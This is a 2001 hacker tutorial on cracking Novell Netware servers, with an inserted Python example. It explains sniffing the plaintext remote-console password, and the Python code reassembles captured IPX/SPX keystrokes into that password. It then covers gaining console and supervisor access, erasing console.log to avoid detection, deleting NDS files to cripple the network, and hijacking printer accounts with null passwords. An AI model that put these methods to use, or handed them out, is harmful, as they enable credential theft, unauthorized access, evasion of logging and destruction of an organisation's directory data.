The Disclaimer
I don't encourage illegal activities, I really mean this! And if you really want to try something against the law and you get caught, I have warned you, hehe :p
Introduction
This is the first tutorial I have written. It was originally written only for BSRF (Black Sun Research Facility), and it will probably not be the last one :) So if you discover some errors, please remember this was my first one. One last note before I begin writing about "Cracking Netware": at the moment you can't contact me by e-mail or otherwise, I would rather remain 'hidden' for the moment.
Index
Novell Netware tutorials:
Novell Netware - Cracking Netware
Maybe I'll write an advisory for system administrators, or even publish vulnerabilities in Netware that I found myself, but remember I can't guarantee anything! It's possible that I'll write some other tutorials about different topics as well.
Well, this one will be about:
Novell Netware - Cracking Netware (v 1.04)
Unlike most other operating systems, the original Netware (before 5.x) doesn't run over TCP/IP; it uses its own protocol, Internetwork Packet eXchange (IPX), with SPX on top of it for connection-oriented traffic such as the remote console. IPX has no connection handshake, so TCP-specific Denial of Service (DoS) attacks like SYN flooding simply don't apply to it (which is not the same as being immune to DoS in general). Because Netware didn't get much attention from crackers, administrators thought their systems were impenetrable, and so they didn't care much about security updates. Now many of you guys think this is really cool and think you can crack any Netware server with some help from the many tools that are available online. Well, I can tell you it's not that easy.
The most important factor is which Netware version they run; if it's version 4.1 or higher, the chance that you sneak in unnoticed is really small. Unless you have to deal with some really lame, and most of the time lazy, system administrators.
It also matters whether the system administrators patch the Netware server(s) on a regular basis.
It helps if you have some kind of permanent account with standard Netware rights, not one that has been restricted.
You will need a lot of time, and you must not be disturbed. Especially in classrooms this will be difficult to get, so you have to find a way with social engineering to accomplish this :(
Before I continue with Netware security and how to bypass it, I'm first going to tell you something about servers and clients.
Once a Netware client has been installed in Windows 9x, it's possible to access the Netware server. When Windows comes up you'll see a login screen. Before you have logged into the network, client and server have already established a connection with each other; that connection just hasn't been authenticated yet by the user who created it! You can see this connection on the console when monitor.nlm is loaded. You don't know what the console is? Ok, I'll explain. The server is nothing more than a computer, though not a normal one like a desktop or tower; call it a very big tower. On this machine the Netware server software is installed. When you turn the machine on, DOS (6.22 or lower) is loaded first. After that you boot Netware by executing the file "server.exe"; now many files (NLMs, Netware Loadable Modules) are loaded and you get a lot of messages. It looks like booting a Linux machine. After the boot process you are looking at a sort of DOS screen: this is called the console. At the console you have the highest rights on that particular Netware server. You can down the server any time you want with one simple command. So the main group of crackers tries to get this access. But there are many different ways to crack a Netware server; it just depends on what you want to do on it.
By default you have the following levels of rights on a Netware server:
User: Normal user who can access some files in //public, //login and //mail (SYS:PUBLIC, SYS:LOGIN and SYS:MAIL). Mostly they have some print rights too, and they have a home directory.
SuperUser: At schools this right has been given to teachers. They can view students' accounts and delete files if necessary. They cannot create, delete or change accounts in the NDS.
SuperVisor: Only the system administrators are permitted to control everything on the file system and in the NDS. When they want to down the server they have to walk to the console, or do it remotely by starting a program called rconsole, which stands for "Remote Console"; the word explains itself. For security reasons they first have to load "remote.nlm" and "rspx.nlm" at the console, so by default these NLMs aren't loaded.
Console: This is the highest level of access on a Netware server; once you have gained it illegally, nothing can stop you at that moment except a power failure. Also be aware of the log files! Many crackers who gained console access have been caught through them, and if you are dealing with very smart system administrators, they have some program that automatically sends the logs to an off-site location. Once the logs have arrived over there, you have a serious problem...
When you want to gain some high-level access on a Netware server, remember that this can be done in many ways; I explain two different ways.
A note before trying either of them. Way one requires a lot of luck, some cracking skills and also some tools. Way two requires a lot of time (two weeks, maybe a month). You have to see for yourself which way is best. Oh, by the way, if you want to get high-level access with way one, remember that it's critical you don't make any mistakes, because the probability that you'll be caught is high (log files and some other things)!
Please read the whole tutorial first, before trying one way or another. I really recommend it!!!
First way
If you are very, and I mean very, lucky, the system administrators may have loaded "remote.nlm & rspx.nlm" on the Netware console. Try to find a program called "rconsole.exe"; normally you can find it in the directory "//public" (SYS:PUBLIC) on the Netware server. If you don't have File Scan or Read rights on that directory, you have to get the program another way. The program needs a lot of other files before you can execute it, so download those too! To make it a little harder for our 'beloved' system administrators to trace you (and to give yourself more time), don't authenticate to the server while trying to access the console remotely! Before they know who's trying to establish a connection to the Netware server, they have to walk to the server and load monitor.nlm. Then they can see the attacker's ethernet address, and from that moment on they can close your connection to the server whenever they feel like it. But mostly they want to collect some evidence against you, so they just let you 'crack the server'. In the meantime you have already spent some minutes guessing the console password, and every attempt has been written automatically to a log file. Or even worse, every attempt has also been written to their monitor, including (again) your ethernet address and whether you guessed the password right or not.
This sucks, doesn't it? Well, we can combine these two problems into one solution. But again you'll need some luck! Here we go:
The most difficult problem is getting the password, because you don't have enough time to guess it, not even with some kind of brute-force program, so we need to approach the problem from another direction. Now you'll need some luck, because for this trick the following NLMs have to be loaded at the console: "remote & rspx"! The system administrators will only load these if they want to check the console remotely on a regular basis, as I explained before. Just try to access the console with "rconsole.exe" to verify whether those NLMs are loaded, and note: only try this once! If you get a blue empty window, skip to way two! When you are sure those two NLMs are loaded, continue reading; if not, skip to the second way to crack Novell Netware.
When the system administrators access the console remotely they also have to enter a password. This password is sent in plain text over the network (plain text means: unencrypted). If you're dealing with Netware version 4.11 or higher, skip to way two, because there the transmitted console password is encrypted!
When you are on the same network segment as the system administrators (the tutorial calls this the same node address), it's possible to intercept (sniff) the packets from the system administrators to the console. Note that this only works on a shared medium: on a hub every station sees every frame, but a switch only forwards a frame to the port of its destination, so on a switched network you won't see the administrator's traffic at all. You're asking yourself "How do I know?"; the answer: if you're on a small network with approximately 10-50 users, you are on the same segment, unless you're dealing with some paranoid system administrator. If you're dealing with a bigger network, you have to get yourself a copy of a program called "getconn.exe", which reveals the node address of the Netware server. Again you need some luck; if you're not on the same segment as they are, skip to way two.
Don't make the following mistake: when a user or the system administrator is logging into Netware, it's completely senseless to 'sniff' that password. The login password is never sent in the clear: the client proves it knows the password in a challenge/response exchange (Netware 4 uses RSA for the key exchange) that depends on a key the server changes for every session, so whatever you captured is useless the next time that person (re-)logs in.
We now arrive at probably the most difficult part of all.
What we need now is a packet sniffer that supports IPX; I recommend "SpyNet" for the job. Install and run SpyNet. Configure SpyNet so it writes all captured packets to one file. Let the program run for a couple of hours, because the system administrators have to access the console remotely while it is running. You can use your social engineering skills to speed this up. One way is to call them and say you think someone is trying to crack their network. Don't sound too professional, because they could suspect you're the one doing something illegal! Remember, when you're sniffing and writing the packets to disk:
First: This takes a lot of resources, and the longer you run the program (a day or more) the greater the chance the system administrator detects an intruder... Oh, by the way, if the network is protected by some intrusion detection program, your sniffing attempts will automatically be reported to the system administrators. There are (as usual) some anti-anti-sniffers, but that is a whole other story, so I decided NOT to go into it any further.
Second: It's almost impossible to write all sniffed packets (frames) to disk, especially when the network is busy... also remember that your ethernet card is 10/100 Mbit/s, and your disk will often not keep up with that rate, so frames get dropped.
Almost all sniffers have an option to only write packets from a specified address to disk. This has some advantages, of course (more stealthy, and less disk space is needed).
Once you have the packets that contain the password, you have to find a way to extract it from SpyNet's log file yourself. Note that the password is spread over many packets: the remote console sends keystrokes as they are typed, so you get one character per packet, mixed in with whatever else the sniffer caught. Example: if the password were "Netware", you could find it in this order:
packet 34643: j
packet 34644: 6
packet 34645: n
packet 34646: g
packet 34647: 8
packet 34648: e
packet 34649: f
packet 34650: t
packet 34651: 2
packet 34652: w
packet 34653: a
packet 34654: l
packet 34655: r
packet 34656: d
packet 34657: 4
packet 34658: e
packet 34659: v
As you see, this could take some time before you find it; note that Netware passwords are not case sensitive! When you have the password, access the console remotely as soon as possible and create a supervisor account. If you don't know how to create one, download burglar.nlm from blacksun.box.sk and, before trying anything with the program, first take a good look at the readme.
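The extraction step above (and the IPX/SPX protocol the first section describes), as an added example that is not part of the original tutorial and does not read SpyNet's log file, whose format the page does not document: it parses constructed raw IPX/SPX frames (the 30-byte IPX header and, for packet type 5, the 12-byte SPX header), concatenates one-byte keystroke payloads in capture order, filters on source node, destination node and destination socket the way the text recommends, drops SPX retransmissions, and checks whether a candidate password occurs in order inside a noisy unfiltered stream, case-insensitively because Netware passwords are not case sensitive. The node addresses, the other station's traffic and the RSPX socket number 0x8104 are assumptions made here, not facts from the page.

```python
"""Reassemble a remote-console keystroke stream from sniffed IPX/SPX frames.

Added example, not code from the original tutorial and not SpyNet's format.
The frames are constructed inline as raw IPX packets (what an IPX sniffer
hands you after the Ethernet header). Assumptions: rspx.nlm listens on SPX
socket 0x8104, and rconsole sends one keystroke per SPX data packet.
"""
import struct
from dataclasses import dataclass
from typing import Optional

IPX_FMT = ">HHBBI6sHI6sH"  # checksum, length, hops, type, dst net/node/sock, src net/node/sock
SPX_FMT = ">BBHHHHH"       # conn ctrl, datastream, src conn, dst conn, seq, ack, alloc
IPX_LEN = struct.calcsize(IPX_FMT)  # 30
SPX_LEN = struct.calcsize(SPX_FMT)  # 12
IPX_TYPE_SPX = 5
RSPX_SOCKET = 0x8104   # assumption: socket the remote console server uses
OTHER_SOCKET = 0x8060  # constructed: some other SPX service on the same server

# Constructed node (MAC) addresses for the sample capture.
SERVER = bytes.fromhex("00a0c9000001")
ADMIN = bytes.fromhex("0000c0aabb01")
OTHER = bytes.fromhex("0000c0aabb02")


@dataclass
class Packet:
    src_node: bytes
    dst_node: bytes
    dst_sock: int
    seq: Optional[int]   # SPX sequence number; None for non-SPX traffic
    payload: bytes


def parse_ipx(frame: bytes) -> Packet:
    """Decode the IPX header and, for packet type 5, the SPX header that follows it."""
    if len(frame) < IPX_LEN:
        raise ValueError("frame shorter than an IPX header")
    (_chk, length, _hops, ptype, _dnet, dst_node, dst_sock,
     _snet, src_node, _ssock) = struct.unpack(IPX_FMT, frame[:IPX_LEN])
    body = frame[IPX_LEN:length]  # the IPX length field covers header plus data
    if ptype != IPX_TYPE_SPX:
        return Packet(src_node, dst_node, dst_sock, None, body)
    if len(body) < SPX_LEN:
        raise ValueError("SPX packet without a full SPX header")
    seq = struct.unpack(SPX_FMT, body[:SPX_LEN])[4]
    return Packet(src_node, dst_node, dst_sock, seq, body[SPX_LEN:])


def keystrokes(frames, src_node=None, dst_node=None, dst_sock=None) -> str:
    """Concatenate SPX payloads in capture order, keeping only packets that match
    the optional filters. A retransmission (same source and sequence number)
    is dropped so a repeated keystroke is not counted twice. With no filter you
    get the noisy mix of every station the sniffer saw."""
    seen = {}
    for frame in frames:
        p = parse_ipx(frame)
        if p.seq is None:
            continue
        if src_node is not None and p.src_node != src_node:
            continue
        if dst_node is not None and p.dst_node != dst_node:
            continue
        if dst_sock is not None and p.dst_sock != dst_sock:
            continue
        seen.setdefault((p.src_node, p.seq), p.payload)
    return b"".join(seen.values()).decode("ascii", errors="replace")


def find_subsequence(stream: str, candidate: str):
    """Indices where candidate occurs in order inside stream (case-insensitive),
    or None. Greedy left-to-right matching is sufficient for subsequence search."""
    cand, positions = candidate.lower(), []
    for idx, ch in enumerate(stream.lower()):
        if len(positions) < len(cand) and ch == cand[len(positions)]:
            positions.append(idx)
    return positions if len(positions) == len(cand) else None


def build_frame(src_node, dst_node, dst_sock, payload, seq=None) -> bytes:
    """Construct a raw IPX frame; with seq given it is an SPX (type 5) data packet."""
    body = payload if seq is None else struct.pack(SPX_FMT, 0x80, 0, 1, 2, seq, 0, 8) + payload
    ptype = 4 if seq is None else IPX_TYPE_SPX
    hdr = struct.pack(IPX_FMT, 0xFFFF, IPX_LEN + len(body), 0, ptype,
                      1, dst_node, dst_sock, 1, src_node, 0x4001)
    return hdr + body


def sample_capture():
    """Constructed capture: the admin types 'Netware' into rconsole while another
    station runs its own SPX session; the admin's 'w' is retransmitted once."""
    order = [("j", OTHER), ("6", OTHER), ("N", ADMIN), ("g", OTHER), ("8", OTHER),
             ("e", ADMIN), ("f", OTHER), ("t", ADMIN), ("2", OTHER), ("w", ADMIN),
             ("a", ADMIN), ("l", OTHER), ("r", ADMIN), ("d", OTHER), ("4", OTHER),
             ("e", ADMIN), ("v", OTHER)]
    frames, admin_seq, other_seq = [], 0, 100
    for ch, src in order:
        if src == ADMIN:
            admin_seq += 1
            frames.append(build_frame(ADMIN, SERVER, RSPX_SOCKET, ch.encode(), admin_seq))
            if ch == "w":  # SPX retransmission: same sequence number, same byte
                frames.append(build_frame(ADMIN, SERVER, RSPX_SOCKET, ch.encode(), admin_seq))
        else:
            other_seq += 1
            frames.append(build_frame(OTHER, SERVER, OTHER_SOCKET, ch.encode(), other_seq))
    frames.append(build_frame(OTHER, SERVER, 0x0453, b"RIP"))  # plain IPX (type 4), skipped
    return frames


if __name__ == "__main__":
    cap = sample_capture()
    print("unfiltered:", keystrokes(cap))
    print("admin -> rspx:", keystrokes(cap, ADMIN, SERVER, RSPX_SOCKET))
    print("'netware' in noise at:", find_subsequence(keystrokes(cap), "netware"))
```

The unfiltered stream reproduces the noisy listing from the tutorial, while filtering on the admin's node, the server's node and the console socket yields the password on its own. That is the practical point behind the advice to let the sniffer write only packets from a chosen address: on a real capture the filter does the work, and the subsequence search is only a fallback for a capture you could not filter.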
When you're finished with whatever you wanted to do on the Netware server, remember to erase the log file! You'll find it at /etc/console.log (SYS:ETC\CONSOLE.LOG), and you can get rid of it from the console: just unload "conlog.nlm" and then load it again! Now the old log file is overwritten by the new one. But if you then terminate the connection between you and the server, your ethernet address will be written to the new log file! So before quitting I suggest unloading "conlog.nlm" once more. Now you can quit the remote session with ALT-F1.
NDS Addon:
If you really want to do some damage, you have to delete the files in which the NDS (Novell Directory Services, the directory database) is stored. These four files are located in a hidden directory named "/_netware" on the SYS volume. You can only access this directory from the console, with "monitor.nlm". Remember: if the system administrators don't have backups of these files, they have a really big problem.
Some problems I'm aware of:
Nobody can log into Netware anymore, not even the admin!
All information about users, containers, scripts, printers and BorderManager is permanently lost!
If there are multiple Netware servers (almost always) connected to each other, sharing one NDS tree... well, they have to install the Netware server software again on all of them (unless the tree is replicated on the other servers, which is the normal setup, in which case the directory can be recovered from a replica).
And the system administrators have a hell of a job backing up all data from the console.
I really recommend, and I seriously mean it, that you back up these four files to a floppy disk in case you get caught. And if you have a little respect for them, please send them the disk with those four files anonymously, because it will take weeks to restore everything. I really do mean this!
Second way
The primary goal here is to gain access to all files and folders on a Netware server. This is NOT the same as console access! Note: this way takes a lot of time and patience.
When you have a normal user account on any particular Netware server, you only have read, write and erase rights in your home directory. But what you probably don't know is that you also have some read rights in //public, //login and //mail. You cannot 'see' these directories, though, because they aren't mapped to a logical drive. Let me explain... Whenever you have typed in your username and password, the Netware server grants you the rights to all directories and files the system administrators have allowed you. If your home directory is //home/yourhomedir, you have to browse to //home/yourhomedir to view the files there. But if your home directory is located somewhere 'deeper' in the directory structure, like //home/school/it/it2/class2c/yourhomedir, then it takes some time to get to your own directory. This is where drive mapping comes in. When you have created a drive mapping to //home/school/it/it2/class2c/yourhomedir, you just click on the drive letter (by default "z:\") and you are taken directly to yourhomedir. The local system administrators have created a login script that does this for you every time you log into the network. Now you know what drive mapping means... So as I said before, by default all users (including normal users) have only read access to //public, //login and //mail. To access these directories you'll have to create a drive mapping to them (with the MAP command, or from the Netware client in Windows). The most important one is //public. In this directory you'll find all sorts of binaries and some clients like "rconsole.exe". So, map this directory to a logical drive, for example "y:\".
It will really come in handy for the following part if we have some 'other' accounts. Otherwise you'll have to explain to the system administrators what you were doing last week in the late afterhours at school or work. In other words, we need a few other accounts on the Netware server. It's really not advisable to use the account of a fellow student or a colleague at work, even if you know his/her password of course! The best accounts for the crack job are the printer or backup accounts, which most of the time have a NULL (empty) password! Sounds good, doesn't it? Well, I can make it even better: remember I told you that ALL users have (by default) read rights to //public, //login and //mail? So these accounts have them too... The only problem is guessing the correct usernames. Many Novell Netware tutorials will give you some default printer accounts, but many times these accounts don't exist anymore. So I'm going to explain how to get existing usernames on your local Netware server. Here we go:
First you'll need to run the binary //public/win95/nwclnt95.exe; when all the loading is done you'll see a window like Windows 'explorer'. You're now looking at the NDS (Novell Directory Services) tree. All information (containers, scripts, printers & accounts) about the Netware network is stored in here. Search it for a name with the word(s) print, printer, ps or pservice. It's possible you find multiple printer accounts like printerti, printersys or psserv. If you didn't find anything you have to get some accounts a different way: grab a program called "chknull.exe" from the Nomad Mobile Research Centre (NMRC). This program checks all existing Netware accounts for NULL passwords. If this program doesn't find anything, you're really having a bad day and it's advisable to stop reading this tutorial right here :'(. If you did find something, always double-check before you do anything (wrong) with it. You really have to be sure it's really a printer or backup account...
Now that you have some Netware accounts with NULL passwords, we can continue.
Note: Never change the passwords of hijacked accounts; the probability that the system administrator discovers it is way too high. And if you change the password of a printer account, nobody can print anymore! You can guess that it only takes a few hours before the system administrators discover the leak. Now log into the Netware network with the 'stolen' account information, and if you are lucky the system administrators have granted it some directory and file rights. By the way, if the system administrators use Netware BorderManager as firewall and/or HTTP gateway, you can't surf the web without sufficient rights. But most probably you can surf the web when you are logged in as the printer (I could)! This could come in handy when you need to reach the packetstorm database for some kind of exploit. Nevertheless, use HTTP only when it's really necessary! Because the firewall will log all requests to the outside world, and we don't want to make the job too easy for the system administrators!
Again I didn't have enough time to complete this tutorial, so I will continue this subject in Version 1.04. My problem is always the goddamn time.
Copyright (C) 2001, Data Wizard, The Netherlands.